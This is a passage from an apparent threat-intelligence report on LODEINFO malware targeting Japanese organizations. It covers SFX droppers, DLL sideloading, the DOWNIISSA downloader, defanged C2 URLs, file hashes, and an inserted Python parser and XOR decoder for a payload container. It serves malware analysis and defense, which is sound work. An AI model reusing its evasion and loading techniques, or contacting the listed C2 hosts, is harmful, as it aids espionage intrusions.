2022-04-19 09:44:45 ....A        91464        45247  K7SysMon.Exe
------------------- ----- ------------ ------------  ------------------------
2022-06-14 03:47:04             445892       223773  3 files

When a targeted user executes this SFX file, the archive drops other files to %temp% dir and opens 1.docx as a decoy containing just a few Japanese words such as 申込書 (“Application”), 名前 (“name”) and メールアドレス (“email address”), as shown on the following screenshot.

Simple decoy document content from 1.docx

While showing the decoy file to the user, the archive script starts K7SysMon.exe, which loads the malicious DLL from K7SysMn1.dll (MD5: a8220a76c2fe3f505a7561c3adba5d4a) via DLL sideloading. The K7SysMn1.dll contains a BLOB with an obfuscated routine not observed in past activities. The embedded BLOB is divided into four-byte chunks, and each part is stored in one of the 50 randomly named export functions of the DLL binary. These export functions reconstruct the BLOB in an allocated buffer and then decode the LODEINFO shellcode using a one-byte XOR key.

Reassembling the payload BLOB from parts

The payload that is eventually deployed by this implant is the LODEINFO v0.6.3.

Initial infection #3: SFX + DLL sideloading + additional BLOB file

We also discovered another similar SFX file named <masked>[1]sns用動画 拡散のお願い.exe (Translation: The spreading request for sns movie of <masked>). The attackers exploited the name of a well-known Japanese politician. The embedded self-extracting script and files are very similar to the previous sample discussed in the Initial Infection #2 section of this article. However, this sample contains an additional file named K7SysMon.Exe.db. Previously observed loader modules had a BLOB with the encrypted shellcode embedded in the executable file, but in this sample K7SysMn1.dll does not contain the BLOB. Instead, the loader module reads the K7SysMon.Exe.db file as the encrypted BLOB and decrypts the shellcode, which is the LODEINFO v0.6.3 backdoor. The title of the SFX file, as well as the document content, displays a request to spread a video of the famous politician for SNS (Social Network Service). We believe this SFX file was spread via a spear-phishing email on June 29, 2022, based on the last archiving timestamp. The file name and the decoy document suggest the target was the Japanese ruling party or a related organization.

On July 4, 2022, another SFX file (MD5 edc27b958c36b3af5ebc3f775ce0bcc7) was discovered. The archived files, the payload and also the C2 address were very similar to the previous sample set. The only notable difference was the Japanese title of the decoy document: “取材のお願い” (“Request for coverage”). We think this SFX file was probably used to target Japanese media companies.

Initial infection #4: VBA + undiscovered downloader shellcode DOWNIISSA

Back in August 2020, we discovered a fileless downloader shellcode dubbed DOWNJPIT, a variant of the LODEINFO malware, and gave a presentation on it at HITCON 2021. In June 2022, we found another fileless downloader shellcode delivered by a password-protected Microsoft Word file. The filename is 日米同盟の抑止力及び対処力の強化.doc (“Enhancing the deterrence and coping power of the Japan-US alliance.doc”). The document file contains malicious macro code that is completely different from previously investigated samples. Once opened, the doc file shows a Japanese message to enable the following VBA code.

Malicious VBA code inside MS Word file found in June 2022

Unlike past samples, such as the one described in the Initial Infection #1 section of this article, where the malicious VBA macro was used to drop different components of the DLL sideloading technique, in this case the malicious macro code injects and loads an embedded shellcode in the memory of the WINWORD.exe process directly. This implant was not present in past activities and the shellcode is also a newly discovered multi-stage downloader shellcode for LODEINFO v0.6.5.

This downloader shellcode was completely different from the DOWNJPIT variant. The new downloader shellcode has two URLs inside:

  • http://172.104.112[.]218/11554.htm
  • http://www.dvdsesso[.]com/11554.htm

We named this new downloader DOWNIISSA, where IISSA is a string derived from 11554 in the file names found in the URLs. The following diagram shows the complicated infection flow from the malicious document file to the final payload downloaded by DOWNIISSA.

LODEINFO infection process via DOWNIISSA

As mentioned earlier, the embedded macro generates the DOWNIISSA shellcode and injects it in the current process (WINWORD.exe). The main downloader code is base64-encoded and placed at the beginning of the DOWNIISSA shellcode, which gets decoded and patched by the shellcode itself.

DOWNIISSA base64 decode and self-patch

After decoding, several important strings turn out to be protected with one-byte XOR encryption. For example, the two C2 destination addresses are decrypted by the following code.

XORed C2 destinations embedded in the main function of DOWNIISSA shellcode

DOWNIISSA uses the URLDownloadToFileA() API function to download the BLOB from the URL addresses and drop it as %TEMP%/${temp}.tmp. Then it reads the file into allocated memory in the current process and deletes the downloaded temp file immediately. We confirmed that both URLs served the same binary data that was XORed with the one-byte XOR key stored at the end of the BLOB itself. After XOR decryption, the LODEINFO backdoor shellcode v0.6.5 was found. For the final stage of the infection, DOWNIISSA creates an instance of msiexec.exe and injects the LODEINFO backdoor shellcode in the memory of the process.

This new infection flow involving the DOWNIISSA shellcode has not been seen in previous activities using LODEINFO and is a new TTP in 2022.

Apart from the 11554.htm file found in this sample, we also discovered files with other names such as 3390.htm, 5246.htm and 16412.htm, hosted on the same C2 servers in July 2022. 3390.htm (MD5: 0fcf90fe2f5165286814ab858d6d4f2a) and 11554.htm (MD5: f7de43a56bbb271f045851b77656d6bd) were one-byte XORed LODEINFO v0.6.5 shellcodes downloaded via the DOWNIISSA malware. The XOR key for each sample was found at the end of the file. The 5246.htm (MD5: 6780d9241ad4d8de6e78d936fbf5a922) and 16412.htm (MD5: 15b80c5e86b8fd08440fe1a9ca9706c9) files are one-byte XORed data structures of a unique format. The data structure found in the 5246.htm file is shown below:

Offset    Data example                                       Descriptions
0x000000  265715                                             Memory allocation size (probably)
0x000004  265712                                             The size of this data structure without memory allocation size and data size
0x000008  3                                                  Number of embedded files
0x000009  91464                                              Data size of embedded file1
0x00000D  13                                                 Filename size of embedded file1
0x00000E  ‘K7SysMon.Exe’,0                                   Filename of file1
0x00001B  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    The legitimate EXE file for DLL sideloading
          B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
          [SKIPPED]
0x016563  57856                                              Data size of embedded file2
0x016567  13                                                 Filename size of embedded file2
0x016568  ‘K7SysMn1.dll’,0                                   Filename of file2
0x016575  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    Malicious DLL file that is the loading module of LODEINFO without embedded BLOB
          B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
          [SKIPPED]
0x024775  116335                                             Data size of embedded file3
0x024779  16                                                 Filename size of embedded file3
0x02477A  ‘K7SysMon.Exe.db’,0                                Filename of file3
0x02478A  73 3A 3C 9B 9A CF 11 76 11 DF 8A 1F 5A EF 9F 11    A byte XORed BLOB that is read by the loading module to infect LODEINFO v0.6.5. The key is at the end of the data
          DF 92 C7 59 CC 11 EF 96 CD 11 E7 92 A1 64 EC BF
          [SKIPPED]

This data structure contains the names of three files: K7SysMon.exe, K7SysMn1.dll (MD5: c5bdf14982543b71fb419df3b43fbf07) and K7SysMon.exe.db (MD5: c9d724c2c5ae9653045396deaf7e3417). This suggests that an undiscovered downloader module downloads 5246.htm from the C2 to assist with the installation of some embedded files on the victim’s machine.
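As an added illustration of the layout above (our own example code, not from the original article and not the malware's code), the following Python parser walks the 9-byte header and the three embedded-file records, flags which entries carry a PE header, and recovers a BLOB whose one-byte XOR key sits in its last byte. Little-endian fields, dropping the trailing key byte after decoding, and the contents of the constructed sample container are assumptions.

```python
import struct

# Field layout of the 5246.htm container as the article describes it
# (little-endian assumed): u32 alloc_size, u32 struct_size, u8 file_count,
# then per file: u32 data_size, u8 name_len, NUL-terminated name, data bytes.
HEADER = struct.Struct("<IIB")
ENTRY = struct.Struct("<IB")

def parse_container(buf):
    """Walk an already XOR-decoded container and return its embedded files."""
    alloc_size, struct_size, count = HEADER.unpack_from(buf, 0)
    off = HEADER.size
    files = []
    for i in range(count):
        data_size, name_len = ENTRY.unpack_from(buf, off)
        off += ENTRY.size
        raw_name = buf[off:off + name_len]
        if not raw_name.endswith(b"\0"):
            raise ValueError("file %d: filename is not NUL-terminated" % i)
        off += name_len
        data = buf[off:off + data_size]
        if len(data) != data_size:
            raise ValueError("file %d: truncated, expected %d bytes" % (i, data_size))
        files.append({"name": raw_name[:-1].decode("ascii"), "offset": off,
                      "is_pe": data[:2] == b"MZ", "data": data})
        off += data_size
    # struct_size counts everything after the 9-byte header; the article's
    # example values (265721 bytes in total, struct_size 265712) fit this reading.
    return {"alloc_size": alloc_size, "struct_size": struct_size,
            "size_consistent": struct_size == len(buf) - HEADER.size, "files": files}

def xor_decode_key_at_end(blob):
    """Undo the one-byte XOR whose key is the last byte (3390.htm, 11554.htm, file3)."""
    key = blob[-1]
    return bytes(b ^ key for b in blob[:-1])  # trailing key byte dropped (assumed)

def build_container(files, alloc_size=None):
    """Constructed helper (not from the article): pack files into the same layout."""
    body = b"".join(ENTRY.pack(len(data), len(name) + 1) + name.encode("ascii") + b"\0" + data
                    for name, data in files)
    return HEADER.pack(len(body) if alloc_size is None else alloc_size, len(body), len(files)) + body

# Constructed sample: MZ stubs stand in for the two PE files, a XORed string plus key byte for the BLOB.
SAMPLE_PLAIN = b"constructed stage-2 payload"
SAMPLE_KEY = 0x5A
SAMPLE = build_container([
    ("K7SysMon.Exe", b"MZ\x90\x00" + b"\x00" * 12),
    ("K7SysMn1.dll", b"MZ\x90\x00" + b"\x00" * 12),
    ("K7SysMon.Exe.db", bytes(b ^ SAMPLE_KEY for b in SAMPLE_PLAIN) + bytes([SAMPLE_KEY])),
])
```

Feeding the article's three data sizes and filenames into build_container reproduces the table's struct_size of 265712 and the file offsets 0x016575 and 0x02478A, which is a quick way to check the layout reading against a real decoded sample.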

Conclusions

LODEINFO was first discovered in 2019. LODEINFO and its infection methods have been constantly updated and improved to become a more sophisticated cyber-espionage tool while targeting organizations in Japan. The LODEINFO implants and loader modules were also continuously updated to evade security products and complicate manual analysis by security researchers.

These modifications may serve as a confirmation that the threat actors track publications by security researchers and learn how to update their TTPs and improve their malware. In fact, we haven’t detected any activities involving the LILIMRAT and the DOWNJPIT malware from this threat actor since publishing our investigation results at HITCON 2021. We believe this cat-and-mouse game will continue in the future.

To be continued in Part II…


[1] The personal name of the Japanese politician was masked to protect their identity.